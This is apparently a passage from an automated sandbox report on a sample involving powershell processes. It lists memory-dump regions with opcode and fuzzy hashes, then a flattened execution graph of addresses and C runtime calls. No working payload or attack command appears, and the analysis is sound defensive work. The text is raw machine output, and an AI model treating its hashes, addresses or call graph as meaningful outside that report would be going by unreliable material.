                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9af856763d23b615734ce8dc1b009527d1d65a121cec2e29298f94286b1b12b6
                                                                                        • Instruction ID: 4aaf78e29b84175ef00bfd8171c66018044374290bebe3f7d1d81d19484ba4bc
                                                                                        • Opcode Fuzzy Hash: 9af856763d23b615734ce8dc1b009527d1d65a121cec2e29298f94286b1b12b6
                                                                                        • Instruction Fuzzy Hash: 94E0923170D9494FDF95EB5C94918A473E0EF6931030401AAE009CB19BDD29EC848781
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: hM_^
                                                                                        • API String ID: 0-375661323
                                                                                        • Opcode ID: f137ee5d7b3fc3063804fede31b2a859233e7689a0c78d2ce1b2d89a2b2287fb
                                                                                        • Instruction ID: e5af34a19ac4370ac81046e868ca719ec2f1d03bd980fc4c67ad1e2bc9f1af80
                                                                                        • Opcode Fuzzy Hash: f137ee5d7b3fc3063804fede31b2a859233e7689a0c78d2ce1b2d89a2b2287fb
                                                                                        • Instruction Fuzzy Hash: A6811CA3B0D6965BE31277AC68B22E93BE4DF47635B0D01F3C298DA0C3ED4D24179291
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ^
                                                                                        • API String ID: 0-1590793086
                                                                                        • Opcode ID: 7fb80e236a689fb5e8fc50ad0501bbefcada416b8b3659f96b4c8e1bb00ce553
                                                                                        • Instruction ID: 4bf4013d62ea14166bc7c751bcd26d20a7057a89b5c450387623c53310ef999b
                                                                                        • Opcode Fuzzy Hash: 7fb80e236a689fb5e8fc50ad0501bbefcada416b8b3659f96b4c8e1bb00ce553
                                                                                        • Instruction Fuzzy Hash: 6F51B667F0D6DB2BF763462C68B60D93BD0DF53670B0A02B3C685C60D79D4DA816A251
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2333142720.00007FFD34430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34430000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7ffd34430000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f36b2040392a54c6e6f46314fc341bafe26908622bf113f6243e26323c521fc2
                                                                                        • Instruction ID: 38dec14e49dc0bb4f102d3232271891c0c340dfca76b8539482fa8861101f8d0
                                                                                        • Opcode Fuzzy Hash: f36b2040392a54c6e6f46314fc341bafe26908622bf113f6243e26323c521fc2
                                                                                        • Instruction Fuzzy Hash: 6151F357F0D7D68FE722A66C58F20E57FA0DF5366970E00F7C285CA493AD4C2806A352
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38d27373318f3d5e739e943c19b3f64cf060ed551a60b98427fef5e9506fb44a
                                                                                        • Instruction ID: d540018c2f7477da80089d1141e8a106b87b3023a2125abb2deaa94d570c8deb
                                                                                        • Opcode Fuzzy Hash: 38d27373318f3d5e739e943c19b3f64cf060ed551a60b98427fef5e9506fb44a
                                                                                        • Instruction Fuzzy Hash: 90323831F00205DFDBA49F69C858ABBBBF2AF85290F14807BD566CB245DB31C941C7A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$(f\l$(f\l
                                                                                        • API String ID: 0-1181456973
                                                                                        • Opcode ID: 76299946d18779db8c1d1d328785dbb6d0ca2825089730450b3fbd4dc5c0c15a
                                                                                        • Instruction ID: 64326312cbfd2a9e7678f71ba2a95f4c7cabb034b631583d6ca0170d27fc257c
                                                                                        • Opcode Fuzzy Hash: 76299946d18779db8c1d1d328785dbb6d0ca2825089730450b3fbd4dc5c0c15a
                                                                                        • Instruction Fuzzy Hash: D1623B74F012048FEB54DB98C855BAAB7F2AF85304F24C06AD90A9F355CB72ED46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$(f\l$(f\l$x.Mk$-Mk
                                                                                        • API String ID: 0-1482531275
                                                                                        • Opcode ID: 4aabf7a250c9f5ace39ed0aaf11a907c3e64f4e33bab64452fedf57d9f94925a
                                                                                        • Instruction ID: 926d52a494af887d3e14fcae581cefce85b8bfe37e0af949f4824c4058c612be
                                                                                        • Opcode Fuzzy Hash: 4aabf7a250c9f5ace39ed0aaf11a907c3e64f4e33bab64452fedf57d9f94925a
                                                                                        • Instruction Fuzzy Hash: E4423B74E11214CFEB64DFA8C851BAABBB2AF85304F2181AAD509AF355CB31DD41CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$x.Mk$x.Mk$-Mk
                                                                                        • API String ID: 0-1366186035
                                                                                        • Opcode ID: c83b5ae08e91deca5417215584b11dddb8e645f411bdb886469bca926181de34
                                                                                        • Instruction ID: 5d26758ae545c7b112019fa6eca89dae69870edcca00b069159bfd2104f61f4e
                                                                                        • Opcode Fuzzy Hash: c83b5ae08e91deca5417215584b11dddb8e645f411bdb886469bca926181de34
                                                                                        • Instruction Fuzzy Hash: 1CF18074B002149FE764EB64CC61FAEB7B3AB85304F1180AAE5096F391CB71DD818F92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l$x.Mk
                                                                                        • API String ID: 0-668568786
                                                                                        • Opcode ID: 3c736371447c15008af6d93e405121a2d040cb4463a5a79a124fe12b9f28ffdc
                                                                                        • Instruction ID: af00851cb44f08ddbe64a779e50bd7b1bf98f347f2972966909d656af2c5ff12
                                                                                        • Opcode Fuzzy Hash: 3c736371447c15008af6d93e405121a2d040cb4463a5a79a124fe12b9f28ffdc
                                                                                        • Instruction Fuzzy Hash: 64916B75B012049FEB94DBA4C851BAEB7E3AF89300F11846AE5056F395CF71ED41CBA2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (f\l$(f\l
                                                                                        • API String ID: 0-493901671
                                                                                        • Opcode ID: 6ee42b444c6886b79a332626cdc916999bfaac6d79b6a78a69bca2394b4c2f01
                                                                                        • Instruction ID: 2ab49d5854cedef4ab00d1c1d28067b6f6eb97792e89b8517ca4a30d305f5dd0
                                                                                        • Opcode Fuzzy Hash: 6ee42b444c6886b79a332626cdc916999bfaac6d79b6a78a69bca2394b4c2f01
                                                                                        • Instruction Fuzzy Hash: 2C425A75E002048FEB54DB94C485FAAB7B2AF85314F24C06AE90A9F355CB72ED46CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2500652068.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:2.7%
                                                                                        Total number of Nodes:1648
                                                                                        Total number of Limit Nodes:1
7738 22324c66 7736->7738 7740 22324d01 38 API calls 7737->7740 7739 22326368 _free 20 API calls 7738->7739 7744 22324c6b 7739->7744 7741 22324c88 7740->7741 7743 2232571e _free 20 API calls 7741->7743 7741->7744 7742 2232571e _free 20 API calls 7742->7733 7743->7744 7744->7742 7747 22324d26 7745->7747 7749 22324d86 7747->7749 7751 223270eb 7747->7751 7748 22324c50 7748->7735 7749->7748 7750 223270eb 38 API calls 7749->7750 7750->7749 7754 22327092 7751->7754 7755 223254a7 __fassign 38 API calls 7754->7755 7756 223270a6 7755->7756 7756->7747 6374 22325303 6377 223250a5 6374->6377 6386 2232502f 6377->6386 6380 2232502f 5 API calls 6381 223250c3 6380->6381 6390 22325000 6381->6390 6384 22325000 20 API calls 6385 223250d9 6384->6385 6387 22325048 6386->6387 6388 22322ada _ValidateLocalCookies 5 API calls 6387->6388 6389 22325069 6388->6389 6389->6380 6391 2232502a 6390->6391 6392 2232500d 6390->6392 6391->6384 6393 22325024 6392->6393 6394 2232571e _free 20 API calls 6392->6394 6395 2232571e _free 20 API calls 6393->6395 6394->6392 6395->6391 6396 22327103 GetCommandLineA GetCommandLineW 6494 2232af43 6495 2232af59 6494->6495 6496 2232af4d 6494->6496 6496->6495 6497 2232af52 CloseHandle 6496->6497 6497->6495 6498 22328640 6501 22328657 6498->6501 6502 22328665 6501->6502 6503 22328679 6501->6503 6504 22326368 _free 20 API calls 6502->6504 6505 22328693 6503->6505 6506 22328681 6503->6506 6507 2232866a 6504->6507 6512 22328652 6505->6512 6514 223254a7 6505->6514 6508 22326368 _free 20 API calls 6506->6508 6510 223262ac _abort 26 API calls 6507->6510 6511 22328686 6508->6511 6510->6512 6513 223262ac _abort 26 API calls 6511->6513 6513->6512 6515 223254c4 6514->6515 6516 223254ba 6514->6516 6515->6516 6517 22325af6 _abort 38 API calls 6515->6517 6516->6512 6518 223254e5 6517->6518 6522 22327a00 6518->6522 6523 22327a13 6522->6523 6524 223254fe 6522->6524 6523->6524 6530 22327f0f 6523->6530 6526 22327a2d 6524->6526 6527 22327a40 6526->6527 6528 22327a55 6526->6528 
6527->6528 6665 22326d7e 6527->6665 6528->6516 6531 22327f1b ___scrt_is_nonwritable_in_current_image 6530->6531 6532 22325af6 _abort 38 API calls 6531->6532 6533 22327f24 6532->6533 6534 22327f72 _abort 6533->6534 6542 22325671 RtlEnterCriticalSection 6533->6542 6534->6524 6536 22327f42 6543 22327f86 6536->6543 6541 223255a8 _abort 38 API calls 6541->6534 6542->6536 6544 22327f56 6543->6544 6545 22327f94 __fassign 6543->6545 6547 22327f75 6544->6547 6545->6544 6550 22327cc2 6545->6550 6664 223256b9 RtlLeaveCriticalSection 6547->6664 6549 22327f69 6549->6534 6549->6541 6551 22327d42 6550->6551 6554 22327cd8 6550->6554 6552 22327d90 6551->6552 6555 2232571e _free 20 API calls 6551->6555 6618 22327e35 6552->6618 6554->6551 6556 22327d0b 6554->6556 6561 2232571e _free 20 API calls 6554->6561 6557 22327d64 6555->6557 6558 22327d2d 6556->6558 6566 2232571e _free 20 API calls 6556->6566 6559 2232571e _free 20 API calls 6557->6559 6560 2232571e _free 20 API calls 6558->6560 6562 22327d77 6559->6562 6563 22327d37 6560->6563 6565 22327d00 6561->6565 6567 2232571e _free 20 API calls 6562->6567 6568 2232571e _free 20 API calls 6563->6568 6564 22327dfe 6569 2232571e _free 20 API calls 6564->6569 6578 223290ba 6565->6578 6571 22327d22 6566->6571 6572 22327d85 6567->6572 6568->6551 6573 22327e04 6569->6573 6606 223291b8 6571->6606 6576 2232571e _free 20 API calls 6572->6576 6573->6544 6574 22327d9e 6574->6564 6577 2232571e 20 API calls _free 6574->6577 6576->6552 6577->6574 6579 223290cb 6578->6579 6605 223291b4 6578->6605 6580 223290dc 6579->6580 6581 2232571e _free 20 API calls 6579->6581 6582 223290ee 6580->6582 6583 2232571e _free 20 API calls 6580->6583 6581->6580 6584 22329100 6582->6584 6585 2232571e _free 20 API calls 6582->6585 6583->6582 6586 22329112 6584->6586 6587 2232571e _free 20 API calls 6584->6587 6585->6584 6588 22329124 6586->6588 6589 2232571e _free 20 API calls 6586->6589 6587->6586 6590 22329136 6588->6590 6591 2232571e _free 20 API calls 6588->6591 
6589->6588 6592 22329148 6590->6592 6593 2232571e _free 20 API calls 6590->6593 6591->6590 6594 2232915a 6592->6594 6595 2232571e _free 20 API calls 6592->6595 6593->6592 6596 2232571e _free 20 API calls 6594->6596 6600 2232916c 6594->6600 6595->6594 6596->6600 6597 2232917e 6599 22329190 6597->6599 6601 2232571e _free 20 API calls 6597->6601 6598 2232571e _free 20 API calls 6598->6597 6602 223291a2 6599->6602 6603 2232571e _free 20 API calls 6599->6603 6600->6597 6600->6598 6601->6599 6604 2232571e _free 20 API calls 6602->6604 6602->6605 6603->6602 6604->6605 6605->6556 6607 223291c5 6606->6607 6608 2232921d 6606->6608 6609 223291d5 6607->6609 6611 2232571e _free 20 API calls 6607->6611 6608->6558 6610 223291e7 6609->6610 6612 2232571e _free 20 API calls 6609->6612 6613 223291f9 6610->6613 6614 2232571e _free 20 API calls 6610->6614 6611->6609 6612->6610 6615 2232920b 6613->6615 6616 2232571e _free 20 API calls 6613->6616 6614->6613 6615->6608 6617 2232571e _free 20 API calls 6615->6617 6616->6615 6617->6608 6619 22327e42 6618->6619 6623 22327e60 6618->6623 6619->6623 6624 2232925d 6619->6624 6622 2232571e _free 20 API calls 6622->6623 6623->6574 6625 22327e5a 6624->6625 6626 2232926e 6624->6626 6625->6622 6660 22329221 6626->6660 6629 22329221 __fassign 20 API calls 6630 22329281 6629->6630 6631 22329221 __fassign 20 API calls 6630->6631 6632 2232928c 6631->6632 6633 22329221 __fassign 20 API calls 6632->6633 6634 22329297 6633->6634 6635 22329221 __fassign 20 API calls 6634->6635 6636 223292a5 6635->6636 6637 2232571e _free 20 API calls 6636->6637 6638 223292b0 6637->6638 6639 2232571e _free 20 API calls 6638->6639 6640 223292bb 6639->6640 6641 2232571e _free 20 API calls 6640->6641 6642 223292c6 6641->6642 6643 22329221 __fassign 20 API calls 6642->6643 6644 223292d4 6643->6644 6645 22329221 __fassign 20 API calls 6644->6645 6646 223292e2 6645->6646 6647 22329221 __fassign 20 API calls 6646->6647 6648 223292f3 6647->6648 6649 22329221 __fassign 20 API calls 
6648->6649 6650 22329301 6649->6650 6651 22329221 __fassign 20 API calls 6650->6651 6652 2232930f 6651->6652 6653 2232571e _free 20 API calls 6652->6653 6654 2232931a 6653->6654 6655 2232571e _free 20 API calls 6654->6655 6656 22329325 6655->6656 6657 2232571e _free 20 API calls 6656->6657 6658 22329330 6657->6658 6659 2232571e _free 20 API calls 6658->6659 6659->6625 6661 22329258 6660->6661 6662 22329248 6660->6662 6661->6629 6662->6661 6663 2232571e _free 20 API calls 6662->6663 6663->6662 6664->6549 6666 22326d8a ___scrt_is_nonwritable_in_current_image 6665->6666 6667 22325af6 _abort 38 API calls 6666->6667 6668 22326d94 6667->6668 6671 22326e18 _abort 6668->6671 6672 223255a8 _abort 38 API calls 6668->6672 6673 2232571e _free 20 API calls 6668->6673 6674 22325671 RtlEnterCriticalSection 6668->6674 6675 22326e0f 6668->6675 6671->6528 6672->6668 6673->6668 6674->6668 6678 223256b9 RtlLeaveCriticalSection 6675->6678 6677 22326e16 6677->6668 6678->6677 7232 22327a80 7233 22327a8d 7232->7233 7234 2232637b _abort 20 API calls 7233->7234 7235 22327aa7 7234->7235 7236 2232571e _free 20 API calls 7235->7236 7237 22327ab3 7236->7237 7238 2232637b _abort 20 API calls 7237->7238 7242 22327ad9 7237->7242 7239 22327acd 7238->7239 7241 2232571e _free 20 API calls 7239->7241 7240 22325eb7 11 API calls 7240->7242 7241->7242 7242->7240 7243 22327ae5 7242->7243 7757 2232a1c6 IsProcessorFeaturePresent 7758 22327bc7 7759 22327bd3 ___scrt_is_nonwritable_in_current_image 7758->7759 7760 22327c0a _abort 7759->7760 7766 22325671 RtlEnterCriticalSection 7759->7766 7762 22327be7 7763 22327f86 __fassign 20 API calls 7762->7763 7764 22327bf7 7763->7764 7767 22327c10 7764->7767 7766->7762 7770 223256b9 RtlLeaveCriticalSection 7767->7770 7769 22327c17 7769->7760 7770->7769 6679 2232a945 6683 2232a96d 6679->6683 6680 2232a9a5 6681 2232a997 6688 2232aa17 6681->6688 6682 2232a99e 6692 2232aa00 6682->6692 6683->6680 6683->6681 6683->6682 6689 2232aa20 6688->6689 6696 2232b19b 6689->6696 6693 
2232aa20 6692->6693 6694 2232b19b __startOneArgErrorHandling 21 API calls 6693->6694 6695 2232a9a3 6694->6695 6697 2232b1da __startOneArgErrorHandling 6696->6697 6701 2232b25c __startOneArgErrorHandling 6697->6701 6706 2232b59e 6697->6706 6699 2232b286 6700 2232b8b2 __startOneArgErrorHandling 20 API calls 6699->6700 6702 2232b292 6699->6702 6700->6702 6701->6699 6703 223278a3 __startOneArgErrorHandling 5 API calls 6701->6703 6704 22322ada _ValidateLocalCookies 5 API calls 6702->6704 6703->6699 6705 2232a99c 6704->6705 6707 2232b5c1 __raise_exc RaiseException 6706->6707 6708 2232b5bc 6707->6708 6708->6701 6709 22325348 6710 22323529 ___vcrt_uninitialize 8 API calls 6709->6710 6711 2232534f 6710->6711 6712 22327b48 6722 22328ebf 6712->6722 6716 22327b55 6735 2232907c 6716->6735 6719 22327b7f 6720 2232571e _free 20 API calls 6719->6720 6721 22327b8a 6720->6721 6739 22328ec8 6722->6739 6724 22327b50 6725 22328fdc 6724->6725 6726 22328fe8 ___scrt_is_nonwritable_in_current_image 6725->6726 6759 22325671 RtlEnterCriticalSection 6726->6759 6728 2232905e 6773 22329073 6728->6773 6730 22328ff3 6730->6728 6732 22329032 RtlDeleteCriticalSection 6730->6732 6760 2232a09c 6730->6760 6731 2232906a _abort 6731->6716 6733 2232571e _free 20 API calls 6732->6733 6733->6730 6736 22329092 6735->6736 6738 22327b64 RtlDeleteCriticalSection 6735->6738 6737 2232571e _free 20 API calls 6736->6737 6736->6738 6737->6738 6738->6716 6738->6719 6740 22328ed4 ___scrt_is_nonwritable_in_current_image 6739->6740 6749 22325671 RtlEnterCriticalSection 6740->6749 6742 22328f77 6754 22328f97 6742->6754 6745 22328ee3 6745->6742 6748 22328e78 66 API calls 6745->6748 6750 22327b94 RtlEnterCriticalSection 6745->6750 6751 22328f6d 6745->6751 6747 22328f83 _abort 6747->6724 6748->6745 6749->6745 6750->6745 6757 22327ba8 RtlLeaveCriticalSection 6751->6757 6753 22328f75 6753->6745 6758 223256b9 RtlLeaveCriticalSection 6754->6758 6756 22328f9e 6756->6747 6757->6753 6758->6756 6759->6730 6761 2232a0a8 
___scrt_is_nonwritable_in_current_image 6760->6761 6762 2232a0b9 6761->6762 6763 2232a0ce 6761->6763 6764 22326368 _free 20 API calls 6762->6764 6772 2232a0c9 _abort 6763->6772 6776 22327b94 RtlEnterCriticalSection 6763->6776 6766 2232a0be 6764->6766 6768 223262ac _abort 26 API calls 6766->6768 6767 2232a0ea 6777 2232a026 6767->6777 6768->6772 6770 2232a0f5 6793 2232a112 6770->6793 6772->6730 7041 223256b9 RtlLeaveCriticalSection 6773->7041 6775 2232907a 6775->6731 6776->6767 6778 2232a033 6777->6778 6779 2232a048 6777->6779 6780 22326368 _free 20 API calls 6778->6780 6785 2232a043 6779->6785 6796 22328e12 6779->6796 6781 2232a038 6780->6781 6783 223262ac _abort 26 API calls 6781->6783 6783->6785 6785->6770 6786 2232907c 20 API calls 6787 2232a064 6786->6787 6802 22327a5a 6787->6802 6789 2232a06a 6809 2232adce 6789->6809 6792 2232571e _free 20 API calls 6792->6785 7040 22327ba8 RtlLeaveCriticalSection 6793->7040 6795 2232a11a 6795->6772 6797 22328e2a 6796->6797 6799 22328e26 6796->6799 6798 22327a5a 26 API calls 6797->6798 6797->6799 6800 22328e4a 6798->6800 6799->6786 6824 22329a22 6800->6824 6803 22327a66 6802->6803 6804 22327a7b 6802->6804 6805 22326368 _free 20 API calls 6803->6805 6804->6789 6806 22327a6b 6805->6806 6807 223262ac _abort 26 API calls 6806->6807 6808 22327a76 6807->6808 6808->6789 6810 2232adf2 6809->6810 6811 2232addd 6809->6811 6813 2232ae2d 6810->6813 6817 2232ae19 6810->6817 6812 22326355 __dosmaperr 20 API calls 6811->6812 6814 2232ade2 6812->6814 6815 22326355 __dosmaperr 20 API calls 6813->6815 6816 22326368 _free 20 API calls 6814->6816 6818 2232ae32 6815->6818 6821 2232a070 6816->6821 6997 2232ada6 6817->6997 6820 22326368 _free 20 API calls 6818->6820 6822 2232ae3a 6820->6822 6821->6785 6821->6792 6823 223262ac _abort 26 API calls 6822->6823 6823->6821 6825 22329a2e ___scrt_is_nonwritable_in_current_image 6824->6825 6826 22329a36 6825->6826 6827 22329a4e 6825->6827 6849 22326355 6826->6849 6828 22329aec 6827->6828 6832 22329a83 
6827->6832 6830 22326355 __dosmaperr 20 API calls 6828->6830 6833 22329af1 6830->6833 6852 22328c7b RtlEnterCriticalSection 6832->6852 6836 22326368 _free 20 API calls 6833->6836 6834 22326368 _free 20 API calls 6837 22329a43 _abort 6834->6837 6839 22329af9 6836->6839 6837->6799 6838 22329a89 6840 22329aa5 6838->6840 6841 22329aba 6838->6841 6842 223262ac _abort 26 API calls 6839->6842 6843 22326368 _free 20 API calls 6840->6843 6853 22329b0d 6841->6853 6842->6837 6845 22329aaa 6843->6845 6847 22326355 __dosmaperr 20 API calls 6845->6847 6846 22329ab5 6904 22329ae4 6846->6904 6847->6846 6850 22325b7a _abort 20 API calls 6849->6850 6851 2232635a 6850->6851 6851->6834 6852->6838 6854 22329b34 6853->6854 6855 22329b3b 6853->6855 6859 22322ada _ValidateLocalCookies 5 API calls 6854->6859 6856 22329b5e 6855->6856 6857 22329b3f 6855->6857 6861 22329baf 6856->6861 6862 22329b92 6856->6862 6858 22326355 __dosmaperr 20 API calls 6857->6858 6860 22329b44 6858->6860 6863 22329d15 6859->6863 6864 22326368 _free 20 API calls 6860->6864 6865 22329bc5 6861->6865 6907 2232a00b 6861->6907 6866 22326355 __dosmaperr 20 API calls 6862->6866 6863->6846 6867 22329b4b 6864->6867 6910 223296b2 6865->6910 6870 22329b97 6866->6870 6871 223262ac _abort 26 API calls 6867->6871 6873 22326368 _free 20 API calls 6870->6873 6871->6854 6876 22329b9f 6873->6876 6874 22329bd3 6880 22329bd7 6874->6880 6881 22329bf9 6874->6881 6875 22329c0c 6878 22329c20 6875->6878 6879 22329c66 WriteFile 6875->6879 6877 223262ac _abort 26 API calls 6876->6877 6877->6854 6884 22329c56 6878->6884 6885 22329c28 6878->6885 6882 22329c89 GetLastError 6879->6882 6887 22329bef 6879->6887 6886 22329ccd 6880->6886 6917 22329645 6880->6917 6922 22329492 GetConsoleCP 6881->6922 6882->6887 6948 22329728 6884->6948 6888 22329c46 6885->6888 6889 22329c2d 6885->6889 6886->6854 6892 22326368 _free 20 API calls 6886->6892 6887->6854 6887->6886 6895 22329ca9 6887->6895 6940 223298f5 6888->6940 6889->6886 6933 22329807 6889->6933 6894 
22329cf2 6892->6894 6897 22326355 __dosmaperr 20 API calls 6894->6897 6898 22329cb0 6895->6898 6899 22329cc4 6895->6899 6897->6854 6900 22326368 _free 20 API calls 6898->6900 6955 22326332 6899->6955 6902 22329cb5 6900->6902 6903 22326355 __dosmaperr 20 API calls 6902->6903 6903->6854 6996 22328c9e RtlLeaveCriticalSection 6904->6996 6906 22329aea 6906->6837 6960 22329f8d 6907->6960 6982 22328dbc 6910->6982 6912 223296c2 6913 223296c7 6912->6913 6914 22325af6 _abort 38 API calls 6912->6914 6913->6874 6913->6875 6915 223296ea 6914->6915 6915->6913 6916 22329708 GetConsoleMode 6915->6916 6916->6913 6919 2232966a 6917->6919 6921 2232969f 6917->6921 6918 223296a1 GetLastError 6918->6921 6919->6918 6920 2232a181 WriteConsoleW CreateFileW 6919->6920 6919->6921 6920->6919 6921->6887 6927 223294f5 6922->6927 6928 22329607 6922->6928 6923 22322ada _ValidateLocalCookies 5 API calls 6925 22329641 6923->6925 6925->6887 6926 223279e6 40 API calls __fassign 6926->6927 6927->6926 6927->6928 6929 2232957b WideCharToMultiByte 6927->6929 6932 223295d2 WriteFile 6927->6932 6991 22327c19 6927->6991 6928->6923 6929->6928 6930 223295a1 WriteFile 6929->6930 6930->6927 6931 2232962a GetLastError 6930->6931 6931->6928 6932->6927 6932->6931 6938 22329816 6933->6938 6934 223298d8 6935 22322ada _ValidateLocalCookies 5 API calls 6934->6935 6939 223298f1 6935->6939 6936 22329894 WriteFile 6937 223298da GetLastError 6936->6937 6936->6938 6937->6934 6938->6934 6938->6936 6939->6887 6947 22329904 6940->6947 6941 22329a0f 6942 22322ada _ValidateLocalCookies 5 API calls 6941->6942 6943 22329a1e 6942->6943 6943->6887 6944 22329986 WideCharToMultiByte 6945 22329a07 GetLastError 6944->6945 6946 223299bb WriteFile 6944->6946 6945->6941 6946->6945 6946->6947 6947->6941 6947->6944 6947->6946 6952 22329737 6948->6952 6949 223297ea 6951 22322ada _ValidateLocalCookies 5 API calls 6949->6951 6950 223297a9 WriteFile 6950->6952 6953 223297ec GetLastError 6950->6953 6954 22329803 6951->6954 6952->6949 6952->6950 
6953->6949 6954->6887 6956 22326355 __dosmaperr 20 API calls 6955->6956 6957 2232633d _free 6956->6957 6958 22326368 _free 20 API calls 6957->6958 6959 22326350 6958->6959 6959->6854 6969 22328d52 6960->6969 6962 22329f9f 6963 22329fa7 6962->6963 6964 22329fb8 SetFilePointerEx 6962->6964 6965 22326368 _free 20 API calls 6963->6965 6966 22329fd0 GetLastError 6964->6966 6968 22329fac 6964->6968 6965->6968 6967 22326332 __dosmaperr 20 API calls 6966->6967 6967->6968 6968->6865 6970 22328d74 6969->6970 6971 22328d5f 6969->6971 6974 22326355 __dosmaperr 20 API calls 6970->6974 6976 22328d99 6970->6976 6972 22326355 __dosmaperr 20 API calls 6971->6972 6973 22328d64 6972->6973 6975 22326368 _free 20 API calls 6973->6975 6977 22328da4 6974->6977 6978 22328d6c 6975->6978 6976->6962 6979 22326368 _free 20 API calls 6977->6979 6978->6962 6980 22328dac 6979->6980 6981 223262ac _abort 26 API calls 6980->6981 6981->6978 6983 22328dc9 6982->6983 6985 22328dd6 6982->6985 6984 22326368 _free 20 API calls 6983->6984 6986 22328dce 6984->6986 6987 22328de2 6985->6987 6988 22326368 _free 20 API calls 6985->6988 6986->6912 6987->6912 6989 22328e03 6988->6989 6990 223262ac _abort 26 API calls 6989->6990 6990->6986 6992 22325af6 _abort 38 API calls 6991->6992 6993 22327c24 6992->6993 6994 22327a00 __fassign 38 API calls 6993->6994 6995 22327c34 6994->6995 6995->6927 6996->6906 7000 2232ad24 6997->7000 6999 2232adca 6999->6821 7001 2232ad30 ___scrt_is_nonwritable_in_current_image 7000->7001 7011 22328c7b RtlEnterCriticalSection 7001->7011 7003 2232ad3e 7004 2232ad70 7003->7004 7005 2232ad65 7003->7005 7007 22326368 _free 20 API calls 7004->7007 7012 2232ae4d 7005->7012 7008 2232ad6b 7007->7008 7027 2232ad9a 7008->7027 7010 2232ad8d _abort 7010->6999 7011->7003 7013 22328d52 26 API calls 7012->7013 7014 2232ae5d 7013->7014 7015 2232ae63 7014->7015 7017 2232ae95 7014->7017 7019 22328d52 26 API calls 7014->7019 7030 22328cc1 7015->7030 7017->7015 7020 22328d52 26 API calls 7017->7020 7023 
